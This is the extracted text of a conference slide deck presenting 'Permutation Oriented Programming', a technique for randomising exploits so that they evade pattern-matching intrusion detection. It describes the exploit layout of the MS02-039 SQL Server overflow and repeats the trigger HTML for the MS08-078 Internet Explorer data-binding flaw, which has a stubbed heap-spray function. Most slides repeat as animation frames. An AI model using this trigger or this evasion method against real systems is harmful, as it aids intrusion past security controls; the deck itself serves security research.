SlideShare a Scribd company logo
"ENG++: Permutation Oriented Programming" por Nelson Brito
Agenda

• 0000 – Once upon a time…   • 0100 – Advanced

• 0001 – Introduction        • 0101 – Demonstration

• 0010 – Brain at work       • 0110 – Conclusions

• 0011 – Approach            • 0111 – Questions and Answers
nbrito@pitbull:~$ whoami
• Nelson Brito:
   • Computer/Network Security          Researcher
      Enthusiast
   • Spare-time Security Researcher
   • Addict for systems’ (in)security
   • sekure SDI

• Home town:
   • Rio de Janeiro

• Public tools:
    • T50: an Experimental Mixed Packet Injector
    • Permutation Oriented Programming
    • ENG++ SQL Fingerprint™

• WEB:
   • http://about.me/nbrito
"ENG++: Permutation Oriented Programming" por Nelson Brito
Once upon a time…
"ENG++: Permutation Oriented Programming" por Nelson Brito
Before starting


0-Day                                                           Pattern-matching
• 0-day is cool, isn’t it? But only if nobody is aware of its   • This technology is as need today as it was in the past,
  existence.                                                      but the security solution cannot rely only on this.

• Once the unknown vulnerability becomes known, the             • No matter how fast is the pattern-matching
  0-day will expire – since a patch or a mitigation is            algorithm, if a pattern does not match, it means that
  released (which comes first).                                   there is no vulnerability exploitation.

• So we can conclude that, once expired (patched or             • No vulnerability exploitation, no protection action…
  mitigated), 0-day has no more value. If you do not              But what if the pattern is wrong?
  believe me, you can try to sell a well-known
  vulnerability to your vulnerability-broker.                   • How can we guarantee that the pattern, which did
                                                                  not match, is the correct approach for a protection
• Some security solutions fight against 0-day faster              action? Was the detection really designed to detect
  than the affected vendor.                                       the vulnerability?
Some concepts


Exploitation                                           Vulnerability
• There are lots of good papers and books describing   • Any vulnerability has a trigger, which leads the
  the exploitation techniques. Thus, I do recommend      vulnerability to a possible and reasonable exploitation.
  you to look for them for a better understanding.
                                                       • For some weakness types the vulnerability allows to
• This lecture has no pretension of being a complete     control the flow of software’s execution, executing
  reference for this topic.                              an arbitrary code (shellcode), such as: CWE-119, CWE-
                                                         120, CWV-134, CWE-190, CWE-196, CWE-367, etc.
• The exploitation path described here is something
  that I decided to follow, and it helped me to        • Before executing a shellcode, the exploitation must
  understand and apply POP (f.k.a. ENG++) to the         deal with the vulnerable ecosystem (trigger, return
  vulnerabilities.                                       address, etc…), performing memory manipulation on
                                                         additional entities (such as: offset, register,
• All the definitions are in compliance with:            JUMP/CALL, stack, heap, memory alignment,
                                                         memory padding, etc).
    – Common Vulnerabilities and Exposures.
    – Common Vulnerability Scoring System.
    – Common Weakness Enumeration.
Current evasion techniques (a.k.a. TT)


Techniques                             Tools
• Packet fragmentation                 • Fragroute / Fragrouter / Sniffjoke

• Stream segmentation                  • ADMutate / ALPHA[2-3] / BETA3 / Others

• Byte and traffic insertion           • Whisker / Nikto / Sandcat

• Polymorphic shellcode                • Snot / Stick / IDS-wakeup / Others

• Denial of Service                    • Sidestep / RPC-evade-poc.pl / Others

• URL obfuscation (+ SSL encryption)   • Predator (AET)

• RPC fragmentation                    • Etc…

• HTML and JavaScript obfuscation

• Etc…
What is Permutation Oriented Programming?



The scenario                                                 The technique
• Remember: “Some security solutions fight against 0-        • To circumvent or avoid a pattern-matching
  day faster than the affected vendor”.                        technology, there are two options:
                                                                 – Easier: know how the vulnerability is detected
• This protection (mitigation) has a long life, and                 (access to signature/vaccine).
  sometimes the correct protection (patch) is not                – Harder: know deeply how to trigger the
  applied.                                                          vulnerability and how to exploit it (access to
                                                                    vulnerable ecosystem).
• People’s hope, consequently their security strategy,
  resides on this security model: vulnerability mitigated,   • Permutation Oriented Programming:
  no patch…                                                      – Deep analysis of a vulnerability, (re)searching
                                                                   for alternatives.
• But what if an old and well-known vulnerability could          – Use all the acquired knowledge and alternatives
  be exploited, even on this security approach model?              to offer a variety of decision points (variants).
                                                                 – Intended to change the behavior of exploit
• According to pattern-matching, any new variant of an             developers.
  old vulnerability exploitation is considered a new             – Use randomness to provide unpredictable
  vulnerability, because there is no pattern to be                 payloads, i.e., permutation.
  matched yet!
What is Permutation Oriented Programming?



The scenario                                                 The technique
• Remember: “Some security solutions fight against 0-        • To circumvent or avoid a pattern-matching
  day faster than the affected vendor”.                        technology, there are two options:
                                                                 – Easier: know how the vulnerability is detected
• This protection (mitigation) has a long life, and                  (access to signature/vaccine).
  sometimes the correct protection (patch) is not                –   Harder: know deeply how to trigger the
  applied.                                                           vulnerability and how to exploit it (access to
                                                                     vulnerable ecosystem).
• People’s hope, consequently their security strategy,
  resides on this security model: vulnerability mitigated,   • Permutation Oriented Programming:
  no patch…                                                      – Deep analysis of a vulnerability, (re)searching
                                                                   for alternatives.
• But what if an old and well-known vulnerability could          – Use all the acquired knowledge and alternatives
  be exploited, even on this security approach model?              to offer a variety of decision points (variants).
                                                                 – Intended to change the behavior of exploit
• According to pattern-matching, any new variant of an             developers.
  old vulnerability exploitation is considered a new             – Use randomness to provide unpredictable
  vulnerability, because there is no pattern to be                 payloads, i.e., permutation.
  matched yet!
What is Permutation Oriented Programming?



The scenario                                                 The technique
• Remember: “Some security solutions fight against 0-        • To circumvent or avoid a pattern-matching
  day faster than the affected vendor”.                        technology, there are two options:
                                                                 – Easier: know how the vulnerability is detected
• This protection (mitigation) has a long life, and                  (access to signature/vaccine).
  sometimes the correct protection (patch) is not                –   Easier: know deeply how to trigger the
  applied.                                                           vulnerability and how to exploit it (access to
                                                                     vulnerable ecosystem).
• People’s hope, consequently their security strategy,
  resides on this security model: vulnerability mitigated,   • Permutation Oriented Programming:
  no patch…                                                      – Deep analysis of a vulnerability, (re)searching
                                                                   for alternatives.
• But what if an old and well-known vulnerability could          – Use all the acquired knowledge and alternatives
  be exploited, even on this security approach model?              to offer a variety of decision points (variants).
                                                                 – Intended to change the behavior of exploit
• According to pattern-matching, any new variant of an             developers.
  old vulnerability exploitation is considered a new             – Use randomness to provide unpredictable
  vulnerability, because there is no pattern to be                 payloads, i.e., permutation.
  matched yet!
POP (pronounced /pŏp/) technique


The truth                                                  The examples
• POP technique deals with vulnerable ecosystem and        • Server-side vulnerabilities:
  memory manipulation, rather than shellcode – it is           – MS02-039: CVE-2002-0649/CWE-120.
  neither a new polymorphic shellcode technique, nor           – MS02-056: CVE-2002-1123/CWE-120.
  an obfuscation technique.

                                                           • Client-side vulnerabilities:
• POP technique can be applied to work with Rapid7
  Metasploit Framework, CORE Impact Pro, Immunity              – MS08-078: CVE-2008-4844/CWE-367.
  CANVAS Professional, and regular stand-alone                 – MS09-002: CVE-2009-0075/CWE-367.
  proof-of-concepts (freestyle coding).
                                                           • Windows 32-bit shellcodes:
• POP technique is neither an additional entropy for           – 波動拳: “CMD /k”.
  tools mentioned above, nor an Advanced Evasion               – 昇龍拳: “CMD /k set DIRCMD=/b”.
  Technique (AET). Instead, POP technique can
  empower both of them.
                                                           • All example modules were ported to work with
                                                             Rapid7 Metasploit Framework, but there are also
• POP technique maintains the exploitation reliability,      examples for client-side in HTML and JavaScript.
  even using random decisions, it is able to achieve all
  exploitation requirements.
What if…

           exploit #1
What if…

           exploit #1



                        exploit #2
What if…

             exploit #1



exploit #N                exploit #2
What if…

             exploit #1



exploit #N                 exploit #2
             shared zone
What if…

             exploit #1



exploit #N                 exploit #2
             shared zone
What if…

             exploit #1



exploit #N                 exploit #2
             shared zone




                                        Permutation
                                          Oriented
                                        Programming
"ENG++: Permutation Oriented Programming" por Nelson Brito
Vulnerabilities


MS02-039                                  MS08-078
• Common Vulnerabilities and Exposures:   • Common Vulnerabilities and Exposures:
    – CVE-2002-0649.                          – CVE-2008-4844.

• Common Weakness Enumeration:            • Common Weakness Enumeration:
    – CWE-120.                                – CWE-367.

• CVSS Severity: 7.5 (HIGH).              • CVSS Severity: 9.3 (HIGH).

• Target:                                 • Target:
    – Microsoft SQL Server 2000 SP0-2.        – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7
                                                 and 8 Beta 2.
• Vulnerable ecosystem:
    – Protocol UDP.                       • Vulnerable ecosystem:
    – Communication Port 1434.                – DHTML with embedded Data binding.
    – SQL Request CLNT_UCAST_INST.            – XML Data Source Object (DSO).
    – INSTANCENAME >= 96 bytes.               – Data Consumer (HTML element) pointing to a
    – INSTANCENAME != NULL.                      dereferenced XML DSO.
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability




                                                                            memory stack




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability


  0x04                                                   request




                                                                            memory stack




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename




                                                                            memory stack




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename




                                                                               overflow




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename




                  additional entities


                                                                               overflow




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return
 address
                  additional entities


                                                                               overflow




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return     jump
 address    padding
                  additional entities


                                                                               overflow




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return     jump      writable
 address    padding    address
                  additional entities


                                                                               overflow




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return     jump      writable
 address    padding    address
                  additional entities

                       padding
                                                                               overflow




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return     jump      writable
 address    padding    address
                  additional entities

                       padding
                                                                               overflow




                       shellcode
               (injected into the stack)




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                       vulnerability

                      lllllllloooooooonnnnnnnngggggggg
  0x04                                                        request       instancename
                                  instancename


  return          jump      writable
 address         padding    address
                       additional entities

                            padding
                                                                                    overflow


           esp

                            shellcode
                    (injected into the stack)




                 CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                       vulnerability

                      lllllllloooooooonnnnnnnngggggggg
  0x04                                                        request       instancename
                                  instancename


  return          jump      writable
 address         padding    address
                       additional entities

                            padding
                                                                                    overflow


           esp

                            shellcode
                    (injected into the stack)




                 CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                       vulnerability

                      lllllllloooooooonnnnnnnngggggggg
  0x04                                                        request       instancename
                                  instancename


  return          jump      writable
 address         padding    address
                       additional entities

                            padding
                                                                                    overflow


           esp

                            shellcode
                    (injected into the stack)




                 CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                       vulnerability

                      lllllllloooooooonnnnnnnngggggggg
  0x04                                                        request       instancename
                                  instancename


  return          jump      writable
 address         padding    address
                       additional entities

                            padding
                                                                                    overflow


           esp

                            shellcode
                    (injected into the stack)




                 CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                       vulnerability

                      lllllllloooooooonnnnnnnngggggggg
  0x04                                                        request       instancename
                                  instancename


  return          jump      writable
 address         padding    address
                       additional entities

                            padding
                                                                                    overflow


           esp

                            shellcode
                    (injected into the stack)




                 CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return     jump      writable
 address    padding    address
                  additional entities

                       padding
                                                                               overflow




                       shellcode
               (injected into the stack)




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return     jump      writable
 address    padding    address
                  additional entities

                       padding
                                                                               overflow




                       shellcode
               (injected into the stack)




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return     jump      writable
 address    padding    address
                  additional entities

                       padding
                                                                               overflow




                       shellcode
               (injected into the stack)




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return
 address
             jump
            padding
                       writable
                       address                      Trigger
                  additional entities

                       padding
                                                                               overflow




                       shellcode
               (injected into the stack)




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return
 address
             jump
            padding
                       writable
                       address             Permutation
                  additional entities

                       padding
                                                                               overflow




                       shellcode
               (injected into the stack)




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation                                                                                  vulnerability

                 lllllllloooooooonnnnnnnngggggggg
  0x04                                                   request       instancename
                             instancename


  return     jump      writable
 address    padding    address
                  additional entities

                       padding

                                           Exploitation                        overflow




                       shellcode
               (injected into the stack)




            CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
<XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
            <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability

                  Internet Explorer
                  (Data Consumers)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01

       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                 CElement::GetAAdataFld
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                 CElement::GetAAdataSrc
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                             CRecordInstance::CRecordInstance
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                          vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                              CCurrentRecordConsumer::Bind
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                     CCurrentRecordInstance::GetCurrentRecordInstance
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                   CXfer::CreateBinding
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                 CElement::GetAAdataFld
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                 CElement::GetAAdataSrc
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                          vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               CRecordInstance::AddBinding
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                        vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                   CImplPtrAry::Append
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02

       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                                 CElement::GetAAdataFld
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                                 CElement::GetAAdataSrc
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                             CRecordInstance::CRecordInstance
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                          vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                              CCurrentRecordConsumer::Bind
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                     CCurrentRecordInstance::GetCurrentRecordInstance
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                                   CXfer::CreateBinding
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                                 CElement::GetAAdataFld
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                                 CElement::GetAAdataSrc
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
